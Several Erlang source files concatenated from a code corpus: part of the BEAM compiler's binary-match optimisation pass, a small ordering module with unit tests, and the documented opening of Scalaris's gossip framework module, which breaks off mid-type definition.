aca_enable_reuse([I | Is], EntryBlock, Blocks, Acc, State0) ->
UnusedParams0 = State0#aca.unused_parameters,
case ordsets:intersection(UnusedParams0, beam_ssa:used(I)) of
[] ->
aca_enable_reuse(Is, EntryBlock, Blocks, [I | Acc], State0);
PrematureUses ->
UnusedParams = ordsets:subtract(UnusedParams0, PrematureUses),
%% Mark the offending parameters as unsuitable for context reuse.
ParamInfo = foldl(fun(A, Ps) ->
maps:put(A, {used_before_match, I}, Ps)
end, State0#aca.parameter_info, PrematureUses),
State = State0#aca{ unused_parameters = UnusedParams,
parameter_info = ParamInfo },
aca_enable_reuse(Is, EntryBlock, Blocks, [I | Acc], State)
end;
aca_enable_reuse([], _EntryBlock, Blocks, _Acc, State) ->
{Blocks, State}.
aca_is_reuse_safe(Src, State) ->
%% Context reuse is unsafe unless all uses are dominated by the start_match
%% instruction. Since we only process block 0 it's enough to check if
%% they're unused so far.
ordsets:is_element(Src, State#aca.unused_parameters).
aca_reuse_context(#b_set{dst=Dst, args=[Src]}=I0, Block, Blocks0, State0) ->
%% When matching fails on a reused context it needs to be converted back
%% to a binary. We only need to do this on the success path since it can't
%% be a context on the type failure path, but it's very common for these
%% to converge which requires special handling.
{State1, Last, Blocks} =
aca_handle_convergence(Src, State0, Block#b_blk.last, Blocks0),
Aliases = maps:put(Src, {Last#b_br.succ, Dst}, State1#aca.match_aliases),
ParamInfo = maps:put(Src, suitable_for_reuse, State1#aca.parameter_info),
State = State1#aca{ match_aliases = Aliases,
parameter_info = ParamInfo },
I = beam_ssa:add_anno(accepts_match_contexts, true, I0),
{I, Last, Blocks, State}.
aca_handle_convergence(Src, State0, Last0, Blocks0) ->
#b_br{fail=Fail0,succ=Succ0} = Last0,
SuccPath = beam_ssa:rpo([Succ0], Blocks0),
FailPath = beam_ssa:rpo([Fail0], Blocks0),
%% The promotion logic in alias_matched_binaries breaks down if the source
%% is used after the fail/success paths converge, as we have no way to tell
%% whether the source is a match context or something else past that point.
%%
%% We could handle this through clever insertion of phi nodes but it's
%% far simpler to copy either branch in its entirety. It doesn't matter
%% which one as long as they become disjoint.
ConvergedPaths = ordsets:intersection(
ordsets:from_list(SuccPath),
ordsets:from_list(FailPath)),
case maps:is_key(Src, beam_ssa:uses(ConvergedPaths, Blocks0)) of
true ->
case shortest(SuccPath, FailPath) of
left ->
{Succ, Blocks, Counter} =
aca_copy_successors(Succ0, Blocks0, State0#aca.counter),
State = State0#aca{ counter = Counter },
{State, Last0#b_br{succ=Succ}, Blocks};
right ->
{Fail, Blocks, Counter} =
aca_copy_successors(Fail0, Blocks0, State0#aca.counter),
State = State0#aca{ counter = Counter },
{State, Last0#b_br{fail=Fail}, Blocks}
end;
false ->
{State0, Last0, Blocks0}
end.
shortest([_|As], [_|Bs]) -> shortest(As, Bs);
shortest([], _) -> left;
shortest(_, []) -> right.
%% Copies all successor blocks of Lbl, returning the label to the entry block
%% of this copy. Since the copied blocks aren't referenced anywhere else, they
%% are all guaranteed to be dominated by Lbl.
aca_copy_successors(Lbl0, Blocks0, Counter0) ->
%% Building the block rename map up front greatly simplifies phi node
%% handling.
Path = beam_ssa:rpo([Lbl0], Blocks0),
{BRs, Counter1} = aca_cs_build_brs(Path, Counter0, #{}),
{Blocks, Counter} = aca_cs_1(Path, Blocks0, Counter1, #{}, BRs, #{}),
Lbl = maps:get(Lbl0, BRs),
{Lbl, Blocks, Counter}.
aca_cs_build_brs([?EXCEPTION_BLOCK=Lbl | Path], Counter, Acc) ->
%% ?EXCEPTION_BLOCK is a marker and not an actual block, so renaming it
%% will break exception handling.
aca_cs_build_brs(Path, Counter, Acc#{ Lbl => Lbl });
aca_cs_build_brs([Lbl | Path], Counter0, Acc) ->
aca_cs_build_brs(Path, Counter0 + 1, Acc#{ Lbl => Counter0 });
aca_cs_build_brs([], Counter, Acc) ->
{Acc, Counter}.
aca_cs_1([Lbl0 | Path], Blocks, Counter0, VRs0, BRs, Acc0) ->
Block0 = maps:get(Lbl0, Blocks),
Lbl = maps:get(Lbl0, BRs),
{VRs, Block, Counter} = aca_cs_block(Block0, Counter0, VRs0, BRs),
Acc = maps:put(Lbl, Block, Acc0),
aca_cs_1(Path, Blocks, Counter, VRs, BRs, Acc);
aca_cs_1([], Blocks, Counter, _VRs, _BRs, Acc) ->
{maps:merge(Blocks, Acc), Counter}.
aca_cs_block(#b_blk{is=Is0,last=Last0}=Block0, Counter0, VRs0, BRs) ->
{VRs, Is, Counter} = aca_cs_is(Is0, Counter0, VRs0, BRs, []),
Last = aca_cs_last(Last0, VRs, BRs),
Block = Block0#b_blk{is=Is,last=Last},
{VRs, Block, Counter}.
aca_cs_is([#b_set{op=Op,
dst=Dst0,
args=Args0}=I0 | Is],
Counter0, VRs0, BRs, Acc) ->
Args = case Op of
phi -> aca_cs_args_phi(Args0, VRs0, BRs);
_ -> aca_cs_args(Args0, VRs0)
end,
Counter = Counter0 + 1,
Dst = #b_var{name={'@ssa_bsm_aca',Counter}},
I = I0#b_set{dst=Dst,args=Args},
VRs = maps:put(Dst0, Dst, VRs0),
aca_cs_is(Is, Counter, VRs, BRs, [I | Acc]);
aca_cs_is([], Counter, VRs, _BRs, Acc) ->
{VRs, reverse(Acc), Counter}.
aca_cs_last(#b_switch{arg=Arg0,list=Switch0,fail=Fail0}=Sw, VRs, BRs) ->
Switch = [{Literal, maps:get(Lbl, BRs)} || {Literal, Lbl} <- Switch0],
Sw#b_switch{arg=aca_cs_arg(Arg0, VRs),
fail=maps:get(Fail0, BRs),
list=Switch};
aca_cs_last(#b_br{bool=Arg0,succ=Succ0,fail=Fail0}=Br, VRs, BRs) ->
Br#b_br{bool=aca_cs_arg(Arg0, VRs),
succ=maps:get(Succ0, BRs),
fail=maps:get(Fail0, BRs)};
aca_cs_last(#b_ret{arg=Arg0}=Ret, VRs, _BRs) ->
Ret#b_ret{arg=aca_cs_arg(Arg0, VRs)}.
aca_cs_args_phi([{Arg, Lbl} | Args], VRs, BRs) ->
case BRs of
#{ Lbl := New } ->
[{aca_cs_arg(Arg, VRs), New} | aca_cs_args_phi(Args, VRs, BRs)];
#{} ->
aca_cs_args_phi(Args, VRs, BRs)
end;
aca_cs_args_phi([], _VRs, _BRs) ->
[].
aca_cs_args([Arg | Args], VRs) ->
[aca_cs_arg(Arg, VRs) | aca_cs_args(Args, VRs)];
aca_cs_args([], _VRs) ->
[].
aca_cs_arg(#b_remote{mod=Mod0,name=Name0}=Rem, VRs) ->
Mod = aca_cs_arg(Mod0, VRs),
Name = aca_cs_arg(Name0, VRs),
Rem#b_remote{mod=Mod,name=Name};
aca_cs_arg(Arg, VRs) ->
case VRs of
#{ Arg := New } -> New;
#{} -> Arg
end.
%% Allows contexts to pass through "wrapper functions" where the context is
%% passed directly to a function that accepts match contexts (including other
%% wrappers).
%%
%% This does not alter the function in any way, it only changes parameter info
%% so that skip_outgoing_tail_extraction is aware that it's safe to pass
%% contexts to us.
allow_context_passthrough({Fs, ModInfo0}) ->
ModInfo =
acp_forward_params([{F, beam_ssa:uses(F#b_function.bs)} || F <- Fs],
ModInfo0),
{Fs, ModInfo}.
acp_forward_params(FsUses, ModInfo0) ->
F = fun({#b_function{args=Parameters}=Func, UseMap}, ModInfo) ->
ParamInfo =
foldl(fun(Param, ParamInfo) ->
Uses = maps:get(Param, UseMap, []),
acp_1(Param, Uses, ModInfo, ParamInfo)
end,
funcinfo_get(Func, parameter_info, ModInfo),
Parameters),
funcinfo_set(Func, parameter_info, ParamInfo, ModInfo)
end,
%% Allowing context passthrough on one function may make it possible to
%% enable it on another, so it needs to be repeated for maximum effect.
case foldl(F, ModInfo0, FsUses) of
ModInfo0 -> ModInfo0;
Changed -> acp_forward_params(FsUses, Changed)
end.
%% We have no way to know if an argument is a context, so it's only safe to
%% forward them if they're passed exactly once in the first block. Any other
%% uses are unsafe, including function_clause errors.
acp_1(Param, [{0, #b_set{op=call}=I}], ModInfo, ParamInfo) ->
%% We don't need to provide a context chain as our callers make sure that
%% multiple arguments never reference the same context.
case check_context_call(I, Param, [], ModInfo) of
{no_match_on_entry, _} -> ParamInfo;
Other -> maps:put(Param, Other, ParamInfo)
end;
acp_1(_Param, _Uses, _ModInfo, ParamInfo) ->
ParamInfo.
%% This is conceptually similar to combine_matches but operates across
%% functions. Whenever a tail binary is passed to a parameter that accepts
%% match contexts we'll pass the context instead, improving performance by
%% avoiding the creation of a new match context in the callee.
%%
%% We also create an alias to delay extraction until it's needed as an actual
%% binary, which is often rare on the happy path. The cost of being wrong is
%% negligible (`bs_test_unit + bs_get_tail` vs `bs_get_binary`) so we're
%% applying it unconditionally to keep things simple.
-record(sote, { definitions :: beam_ssa:definition_map(),
mod_info :: module_info(),
match_aliases = #{} :: match_alias_map() }).
skip_outgoing_tail_extraction({Fs0, ModInfo}) ->
Fs = map(fun(F) -> skip_outgoing_tail_extraction(F, ModInfo) end, Fs0),
{Fs, ModInfo}.
skip_outgoing_tail_extraction(#b_function{bs=Blocks0}=F, ModInfo) ->
case funcinfo_get(F, has_bsm_ops, ModInfo) of
true ->
State0 = #sote{ definitions = beam_ssa:definitions(Blocks0),
mod_info = ModInfo },
{Blocks1, State} = beam_ssa:mapfold_instrs_rpo(
fun sote_rewrite_calls/2, [0], State0, Blocks0),
{Blocks, Counter} = alias_matched_binaries(Blocks1,
F#b_function.cnt,
State#sote.match_aliases),
F#b_function{bs=Blocks,cnt=Counter};
false ->
F
end.
sote_rewrite_calls(#b_set{op=call,args=Args}=Call, State) ->
sote_rewrite_call(Call, Args, [], State);
sote_rewrite_calls(I, State) ->
{I, State}.
sote_rewrite_call(Call, [], ArgsOut, State) ->
{Call#b_set{args=reverse(ArgsOut)}, State};
sote_rewrite_call(Call0, [Arg | ArgsIn], ArgsOut, State0) ->
case is_tail_binary(Arg, State0#sote.definitions) of
true ->
CtxChain = context_chain_of(Arg, State0#sote.definitions),
case check_context_call(Call0, Arg, CtxChain, State0#sote.mod_info) of
suitable_for_reuse ->
Ctx = match_context_of(Arg, State0#sote.definitions),
MatchAliases0 = State0#sote.match_aliases,
MatchAliases = maps:put(Arg, {0, Ctx}, MatchAliases0),
State = State0#sote{ match_aliases = MatchAliases },
Call = beam_ssa:add_anno(bsm_info, context_reused, Call0),
sote_rewrite_call(Call, ArgsIn, [Ctx | ArgsOut], State);
Other ->
Call = beam_ssa:add_anno(bsm_info, Other, Call0),
sote_rewrite_call(Call, ArgsIn, [Arg | ArgsOut], State0)
end;
false ->
sote_rewrite_call(Call0, ArgsIn, [Arg | ArgsOut], State0)
end.
%% Adds parameter_type_info annotations to help the validator determine whether
%% our optimizations were safe.
annotate_context_parameters({Fs, ModInfo}) ->
mapfoldl(fun annotate_context_parameters/2, ModInfo, Fs).
annotate_context_parameters(F, ModInfo) ->
ParamInfo = funcinfo_get(F, parameter_info, ModInfo),
TypeAnno0 = beam_ssa:get_anno(parameter_type_info, F, #{}),
TypeAnno = maps:fold(fun(K, _V, Acc) when is_map_key(K, Acc) ->
%% Assertion.
error(conflicting_parameter_types);
(K, suitable_for_reuse, Acc) ->
Acc#{ K => #t_bs_context{} };
(_K, _V, Acc) ->
Acc
end, TypeAnno0, ParamInfo),
{beam_ssa:add_anno(parameter_type_info, TypeAnno, F), ModInfo}.
%%%
%%% +bin_opt_info
%%%
collect_opt_info(Fs) ->
foldl(fun(#b_function{bs=Blocks}=F, Acc0) ->
UseMap = beam_ssa:uses(Blocks),
Where = beam_ssa:get_anno(location, F, []),
beam_ssa:fold_instrs_rpo(
fun(I, Acc) ->
collect_opt_info_1(I, Where, UseMap, Acc)
end, [0], Acc0, Blocks)
end, [], Fs).
collect_opt_info_1(#b_set{op=Op,anno=Anno,dst=Dst}=I, Where, UseMap, Acc0) ->
case is_tail_binary(I) of
true when Op =:= bs_match ->
%% The uses include when the context is passed raw, so we discard
%% everything but the bs_extract instruction to limit warnings to
%% unoptimized uses.
Uses0 = maps:get(Dst, UseMap, []),
case [E || {_, #b_set{op=bs_extract}=E} <- Uses0] of
[Use] -> add_unopt_binary_info(Use, false, Where, UseMap, Acc0);
[] -> Acc0
end;
true ->
%% Add a warning for each use. Note that we don't do anything
%% special if unused as a later pass will remove this instruction
%% anyway.
Uses = maps:get(Dst, UseMap, []),
foldl(fun({_Lbl, Use}, Acc) ->
add_unopt_binary_info(Use, false, Where, UseMap, Acc)
end, Acc0, Uses);
false ->
add_opt_info(Anno, Where, Acc0)
end;
collect_opt_info_1(#b_ret{anno=Anno}, Where, _UseMap, Acc) ->
add_opt_info(Anno, Where, Acc);
collect_opt_info_1(_I, _Where, _Uses, Acc) ->
Acc.
add_opt_info(Anno, Where, Acc) ->
case maps:find(bsm_info, Anno) of
{ok, Term} -> [make_warning(Term, Anno, Where) | Acc];
error -> Acc
end.
%% When an alias is promoted we need to figure out where it goes to ignore
%% warnings for compiler-generated things, and provide more useful warnings in
%% general.
%%
%% We track whether the binary has been used to build another term because it
%% can be helpful when there's no line information.
add_unopt_binary_info(#b_set{op=Follow,dst=Dst}, _Nested, Where, UseMap, Acc0)
when Follow =:= put_tuple;
Follow =:= put_list;
Follow =:= put_map ->
%% Term-building instructions.
{_, Uses} = unzip(maps:get(Dst, UseMap, [])),
foldl(fun(Use, Acc) ->
add_unopt_binary_info(Use, true, Where, UseMap, Acc)
end, Acc0, Uses);
add_unopt_binary_info(#b_set{op=Follow,dst=Dst}, Nested, Where, UseMap, Acc0)
when Follow =:= bs_extract;
Follow =:= phi ->
%% Non-building instructions that need to be followed.
{_, Uses} = unzip(maps:get(Dst, UseMap, [])),
foldl(fun(Use, Acc) ->
add_unopt_binary_info(Use, Nested, Where, UseMap, Acc)
end, Acc0, Uses);
add_unopt_binary_info(#b_set{op=call,
args=[#b_remote{mod=#b_literal{val=erlang},
name=#b_literal{val=error}} |
_Ignored]},
_Nested, _Where, _UseMap, Acc) ->
%% There's no nice way to tell compiler-generated exceptions apart from
%% user ones so we ignore them all. I doubt anyone cares.
Acc;
add_unopt_binary_info(#b_switch{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
[make_promotion_warning(I, Nested, Anno, Where) | Acc];
add_unopt_binary_info(#b_set{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
[make_promotion_warning(I, Nested, Anno, Where) | Acc];
add_unopt_binary_info(#b_ret{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
[make_promotion_warning(I, Nested, Anno, Where) | Acc];
add_unopt_binary_info(#b_br{anno=Anno}=I, Nested, Where, _UseMap, Acc) ->
[make_promotion_warning(I, Nested, Anno, Where) | Acc].
make_promotion_warning(I, Nested, Anno, Where) ->
make_warning({binary_created, I, Nested}, Anno, Where).
make_warning(Term, Anno, Where) ->
{File, Line} = maps:get(location, Anno, Where),
{File,[{Line,?MODULE,Term}]}.
format_opt_info(context_reused) ->
"OPTIMIZED: match context reused";
format_opt_info({binary_created, _, _}=Promotion) ->
io_lib:format("BINARY CREATED: ~s", [format_opt_info_1(Promotion)]);
format_opt_info(Other) ->
io_lib:format("NOT OPTIMIZED: ~s", [format_opt_info_1(Other)]).
format_opt_info_1({binary_created, #b_set{op=call,args=[Call|_]}, false}) ->
io_lib:format("binary is used in call to ~s which doesn't support "
"context reuse", [format_call(Call)]);
format_opt_info_1({binary_created, #b_set{op=call,args=[Call|_]}, true}) ->
io_lib:format("binary is used in term passed to ~s",
[format_call(Call)]);
format_opt_info_1({binary_created, #b_set{op={bif, BIF},args=Args}, false}) ->
io_lib:format("binary is used in ~p/~p which doesn't support context "
"reuse", [BIF, length(Args)]);
format_opt_info_1({binary_created, #b_set{op={bif, BIF},args=Args}, true}) ->
io_lib:format("binary is used in term passed to ~p/~p",
[BIF, length(Args)]);
format_opt_info_1({binary_created, #b_set{op=Op}, false}) ->
io_lib:format("binary is used in '~p' which doesn't support context "
"reuse", [Op]);
format_opt_info_1({binary_created, #b_set{op=Op}, true}) ->
io_lib:format("binary is used in term passed to '~p'", [Op]);
format_opt_info_1({binary_created, #b_ret{}, false}) ->
io_lib:format("binary is returned from the function", []);
format_opt_info_1({binary_created, #b_ret{}, true}) ->
io_lib:format("binary is used in a term that is returned from the "
"function", []);
format_opt_info_1({unsuitable_call, {Call, Inner}}) ->
io_lib:format("binary used in call to ~s, where ~s",
[format_call(Call), format_opt_info_1(Inner)]);
format_opt_info_1({remote_call, Call}) ->
io_lib:format("binary is used in remote call to ~s", [format_call(Call)]);
format_opt_info_1({fun_call, Call}) ->
io_lib:format("binary is used in fun call (~s)",
[format_call(Call)]);
format_opt_info_1({multiple_uses_in_call, Call}) ->
io_lib:format("binary is passed as multiple arguments to ~s",
[format_call(Call)]);
format_opt_info_1({no_match_on_entry, Call}) ->
io_lib:format("binary is used in call to ~s which does not begin with a "
"suitable binary match", [format_call(Call)]);
format_opt_info_1({used_before_match, #b_set{op=call,args=[Call|_]}}) ->
io_lib:format("binary is used in call to ~s before being matched",
[format_call(Call)]);
format_opt_info_1({used_before_match, #b_set{op={bif, BIF},args=Args}}) ->
io_lib:format("binary is used in ~p/~p before being matched",
[BIF, length(Args)]);
format_opt_info_1({used_before_match, #b_set{op=phi}}) ->
io_lib:format("binary is returned from an expression before being "
"matched", []);
format_opt_info_1({used_before_match, #b_set{op=Op}}) ->
io_lib:format("binary is used in '~p' before being matched",[Op]);
format_opt_info_1(Term) ->
io_lib:format("~w", [Term]).
format_call(#b_local{name=#b_literal{val=F},arity=A}) ->
io_lib:format("~p/~p", [F, A]);
format_call(#b_remote{mod=#b_literal{val=M},name=#b_literal{val=F},arity=A}) ->
io_lib:format("~p:~p/~p", [M, F, A]);
format_call(Fun) ->
io_lib:format("~p", [Fun]). | lib/compiler/src/beam_ssa_bsm.erl | 0.546859 | 0.417687 | beam_ssa_bsm.erl | starcoder |
-module(order).
-compile(no_auto_import).
-include_lib("eunit/include/eunit.hrl").
-export([reverse/1, to_int/1, compare/2, max/2, min/2]).
reverse(Order) ->
case Order of
lt ->
gt;
eq ->
eq;
gt ->
lt
end.
-ifdef(TEST).
reverse_test() ->
expect:equal(reverse(lt), gt),
expect:equal(reverse(eq), eq),
expect:equal(reverse(gt), lt).
-endif.
to_int(Order) ->
case Order of
lt ->
-1;
eq ->
0;
gt ->
1
end.
-ifdef(TEST).
to_int_test() ->
expect:equal(to_int(lt), -1),
expect:equal(to_int(eq), 0),
expect:equal(to_int(gt), 1).
-endif.
compare(A, B) ->
case {A, B} of
{lt, lt} ->
eq;
{lt, _} ->
lt;
{eq, eq} ->
eq;
{gt, gt} ->
eq;
{eq, gt} ->
lt;
_ ->
gt
end.
-ifdef(TEST).
compare_test() ->
expect:equal(compare(lt, lt), eq),
expect:equal(compare(lt, eq), lt),
expect:equal(compare(lt, gt), lt),
expect:equal(compare(eq, lt), gt),
expect:equal(compare(eq, eq), eq),
expect:equal(compare(eq, gt), lt),
expect:equal(compare(gt, lt), gt),
expect:equal(compare(gt, eq), gt),
expect:equal(compare(gt, gt), eq).
-endif.
max(A, B) ->
case {A, B} of
{gt, _} ->
gt;
{eq, lt} ->
eq;
_ ->
B
end.
-ifdef(TEST).
max_test() ->
expect:equal(max(lt, lt), lt),
expect:equal(max(lt, eq), eq),
expect:equal(max(lt, gt), gt),
expect:equal(max(eq, lt), eq),
expect:equal(max(eq, eq), eq),
expect:equal(max(eq, gt), gt),
expect:equal(max(gt, lt), gt),
expect:equal(max(gt, eq), gt),
expect:equal(max(gt, gt), gt).
-endif.
min(A, B) ->
case {A, B} of
{lt, _} ->
lt;
{eq, gt} ->
eq;
_ ->
B
end.
-ifdef(TEST).
min_test() ->
expect:equal(min(lt, lt), lt),
expect:equal(min(lt, eq), lt),
expect:equal(min(lt, gt), lt),
expect:equal(min(eq, lt), lt),
expect:equal(min(eq, eq), eq),
expect:equal(min(eq, gt), eq),
expect:equal(min(gt, lt), lt),
expect:equal(min(gt, eq), eq),
expect:equal(min(gt, gt), gt).
-endif. | gleam_stdlib/gen/order.erl | 0.68342 | 0.661212 | order.erl | starcoder |
% @copyright 2010-2015 Zuse Institute Berlin
% Licensed under the Apache License, Version 2.0 (the "License");
% you may not use this file except in compliance with the License.
% You may obtain a copy of the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS,
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
% See the License for the specific language governing permissions and
% limitations under the License.
%% @author <NAME> <<EMAIL>>
%%
%% @doc The behaviour modul (gossip_beh.erl) of the gossiping framework.
%%
%% The framework is designed to allow the implementation of gossip based
%% dissemination and gossip based aggregation protocols. Anti-entropy
%% gossiping was not considered. The communication scheme used by the
%% framework is push-pull gossiping as this offers the best speed of
%% convergence. The membership protocol used for the peer selection is
%% Cyclon.
%%
%% The gossiping framework comprises three kinds of components:
%% <ol>
%% <li> The gossiping behaviour (interface) gossip_beh.erl. The
%% behaviour defines the contract that allows the callback module
%% to be used by the behaviour module. The behaviour defines the
%% contract by specifying functions the callback module has to
%% implement. </li>
%% <li> The callback modules. A callback module implements a concrete
%% gossiping protocol by implementing the gossip_beh.erl, i.e. by
%% implementing the functions specified in the gossip_beh.erl.
%% The callback module provides the protocol specific code.
%% For an example callback module see gossip_load.erl.</li>
%% <li> The behaviour module gossip.erl (this module). The behaviour
%% module provides the generic code of the gossiping framework.
%% It calls the callback functions of the callback modules defined
%% in gossip_beh.erl.</li>
%% </ol>
%%
%% The relation between behaviour and callback modules is modelled as a
%% one-to-many relation. That is to say, the behaviour module is implemented
%% as single process (per node) and all the callback module run in the
%% context of this single process. This has the advantage of reducing the
%% number of spawned processes and allowing for a better grouping of messages.
%%
%% The framework is started as part of the startup procedure of a dht_node.
%% The framework maintains a list of callback modules in the CBMODULES macro
%% which are started together with the framework. It is also possible to
%% individually start and stop callback modules later.
%%
%% The pattern for communication between the behaviour module and a callback
%% module is the following: From the behaviour module to a callback module
%% communication occurs as a call to a function of the callback module.
%% These calls have to return quickly, no long-lasting operations, especially
%% no receiving of messages, are allowed. Therefore, the answers to these
%% function calls are mainly realised as messages from the respective
%% callback module to the behaviour module, not as return values of the
%% function calls.
%%
%% == Phases of a Gossiping Operation ==
%%
%% === Prepare-Request Phase ===
%%
%% The prepare-request phase consists of peer and data selection. The
%% selection of the peer is usually managed by the framework. At the beginning
%% of every cycle the behaviour module requests a peer from the Cyclon
%% module of Scalaris, which is then used for the data exchange. The peer
%% selection is governed by the select_node() function: returning
%% false causes the behaviour module to handle the peer selection as described.
%% Returning true causes the behaviour module to expect a selected_peer
%% message with a peer to be used by for the exchange. How many peers are
%% contracted for data exchanges every cycle depends on the fanout() config
%% function.
%%
%% The selection of the exchange data is dependent on the specific gossiping
%% task and therefore done by a callback module. It is initiated by a call
%% to select_data(). When called with select_data(), the respective callback
%% module has to initiate a selected_data message to the behaviour module,
%% containing the selected exchange data. Both peer and data selection are
%% initiated in immediate succession through periodical trigger messages,
%% so they can run concurrently. When both data and peer are received by
%% the behaviour module, a p2p_exch message with the exchange data is sent
%% to the peer, that is to say to the gossip behaviour module of the peer.
%%
%% === Prepare-Reply Phase ===
%%
%% Upon receiving a p2p_exch message, a node enters the prepare-reply
%% phase and is now in its passive role as responder. This phase is about
%% the integration of the received data and the preparation of the reply data.
%% Both of these tasks need to be handled by the callback module. The
%% behaviour module passes the received data with a call to select_reply_data(QData)
%% to the correspondent callback module, which merges the data with its own
%% local data and prepares the reply data. The reply data is sent back to
%% the behaviour module with a selected_reply_data message. The behaviour
%% module then sends the reply data as a p2p_exch_reply message back to
%% the original requester.
%%
%% === Integrate-Reply Phase ===
%%
%% The integrate-reply phase is triggered by a p2p_exch_reply message.
%% Every p2p_exch_reply is the response to an earlier p2p_exch (although
%% not necessarily to the last p2p_exch request. The p2p_exch_reply contains
%% the reply data from the peer, which is passed to the correspondent
%% callback module with a call to integrate_data(QData). The callback module
%% processes the received data and signals to the behaviour module the
%% completion with an integrated_data message. On a conceptual level, a full
%% cycle is finished at this point and the behaviour module counts cycles
%% by counting the integrated_data messages. Due to the uncertainties
%% of message delays and local clock drift it should be clear however, that
%% this can only be an approximation. For instance, a new cycle could have
%% been started before the reply to the current request has been received
%% (phase interleaving) and, respectively, replies from the other cycle could
%% be "wrongly" counted as finishing the current cycle (cycle interleaving).
%%
%% == Instantiation ==
%%
%% Many of the interactions conducted by the behaviour module are specific
%% to a certain callback module. Therefore, all messages and function
%% concerning a certain callback module need to identify with which callback
%% module the message or call is associated. This is achieved by adding a
%% tuple of the module name and an instance id to all those messages and
%% calls. While the name would be enough to identify the module, adding the
%% instance id allows for multiple instantiation of the same callback module
%% by one behaviour module. This tuple of callback module and instance id
%% is also used to store information specific to a certain callback module
%% in the behaviour module's state.
%%
%%
%% == Messages to the Callback Modules (cb_msg) ==
%%
%% Messages which shall be passed directly to a callback module need to have
%% the form {cb_msg, CModule, Msg}, where CBModule is of type cb_module() and
%% Msg is any message the respective callback module handles.
%%
%% Messages in this form are unpacked by the gossip module and only the Msg
%% is send to the given CMModule.
%%
%% If a callback module wants to receive a response from another process, it
%% should pack its Pid with an envelope of the form
%% {PidOfRequestor, e, 3, {cb_msg, CBModule, '_'}}
%% with a call to
%% EnvPid = comm:reply_as(PidOfRequestor, 3, {cb_msg, CBModule, '_'})
%% and use the EnvPid as SourcePid when sending the request, e.g.
%% comm:send(Pid, {get_dht_nodes, EnvPid}, [{?quiet}])
%%
%%
%% == Used abbreviations ==
%%
%% <ul>
%% <li> cb: callback module (a module implementing the
%% gossip_beh.erl behaviour)
%% </li>
%% </ul>
%%
%% @version $Id$
-module(gossip).
-author('<EMAIL>').
-vsn('$Id$').
-behaviour(gen_component).
-include("scalaris.hrl").
-include("record_helpers.hrl").
% interaction with gen_component
-export([init/1, on_inactive/2, on_active/2]).
%API
-export([start_link/1, activate/1, remove_all_tombstones/0, check_config/0]).
% interaction with the ring maintenance:
-export([rm_filter_slide_msg/3, rm_send_activation_msg/5, rm_my_range_changed/3, rm_send_new_range/5]).
% testing and debugging
-export([start_gossip_task/2, stop_gossip_task/1, tester_create_cb_module_names/1]).
-include("gen_component.hrl").
%% -define(PDB, pdb_ets). % easier debugging because state accesible from outside the process
-define(PDB_OPTIONS, [set]).
-define(PDB, pdb). % better performance
% prevent warnings in the log
-define(SEND_TO_GROUP_MEMBER(Pid, Process, Msg),
comm:send(Pid, Msg, [{group_member, Process}, {shepherd, self()}])).
%% -define(SHOW, config:read(log_level)).
-define(SHOW, debug).
%-define(TRACE(X,Y), log:pal(X,Y)).
%% -define(TRACE(X,Y), ok).
-define(TRACE_TRIGGER(FormatString, Data), ok).
%% -define(TRACE_TRIGGER(FormatString, Data), log:pal(FormatString, Data)).
-define(TRACE_ROUND(FormatString, Data), ok).
%% -define(TRACE_ROUND(FormatString, Data), log:pal(FormatString, Data)).
%% list of callback modules to be activated on startup
-define(CBMODULES, [{gossip_load, default}, {gossip_cyclon, default}, {gossip_vivaldi, default}]).
% for developement, should be disabled for production
-define(FIRST_TRIGGER_DELAY, 0). % delay in s for first trigger
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Type Definitions
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
-type status() :: init | uninit.
-type cb_module_name() :: module().
-type cb_module_id() :: Id :: atom() | uid:global_uid().
-type cb_module() :: {Module::cb_module_name(), Id::cb_module_id()}.
-type cb_status() :: unstarted | started | tombstone.
-type exch_data() :: { ExchData :: undefined | any(), Peer :: undefined | comm:mypid()}.
-type cb_fun_name() :: handle_msg | integrate_data | notify_change | round_has_converged |
select_data | select_node | select_reply_data | web_debug_info | shutdown.
% state record
-record(state, {
cb_modules = [] :: [cb_module()] ,
msg_queue = msg_queue:new() :: msg_queue:msg_queue(),
range = intervals:all() :: intervals:interval(),
status = uninit :: init | uninit,
trigger_add = [] :: [pos_integer()],
trigger_groups = [] :: [{TriggerInterval::pos_integer(), CBModules::[cb_module()]}],
trigger_locks = [] :: [{cb_module(), locked | free}],
trigger_remove = [] :: [pos_integer()],
cb_states = [] :: [{cb_module(), any()}],
cb_stati = [] :: [{cb_module(), cb_status()}],
cycles = [] :: [{cb_module(), non_neg_integer()}],
exch_datas = [] :: [{cb_module(), exch_data()}],
reply_peers = [] :: [{Ref::pos_integer(), Pid::comm:mypid()}],
rounds= [] :: [{cb_module(), non_neg_integer()}]
}).
-type state() :: #state{}.
% accepted messages of gossip behaviour module
-type send_error() :: {send_error, _Pid::comm:mypid(), Msg::message(), Reason::atom()}.
-type bh_message() ::
{activate_gossip, Neighbors::nodelist:neighborhood()} |
{start_gossip_task, CBModule::cb_module(), Args::list()} |
{gossip_trigger, TriggerInterval::pos_integer()} |
{trigger_action, TriggerInterval::pos_integer()} |
{update_range, NewRange::intervals:interval()} |
{web_debug_info, SourcePid::comm:mypid()} |
send_error() |
{bulkowner, deliver, Id::uid:global_uid(), Range::intervals:interval(),
Msg::comm:message(), Parents::[comm:mypid(),...]} |
{remove_all_tombstones}.
-type cb_message() ::
{selected_data, CBModule::cb_module(), PData::gossip_beh:exch_data()} |
{selected_peer, CBModule::cb_module(), CyclonMsg::{cy_cache,
RandomNodes::[node:node_type()]} } |
{p2p_exch, CBModule::cb_module(), SourcePid::comm:mypid(),
PData::gossip_beh:exch_data(), OtherRound::non_neg_integer()} |
{selected_reply_data, CBModule::cb_module(), QData::gossip_beh:exch_data(),
Ref::pos_integer(), Round::non_neg_integer()} |
{p2p_exch_reply, CBModule::cb_module(), SourcePid::comm:mypid(),
QData::gossip_beh:exch_data(), OtherRound::non_neg_integer()} |
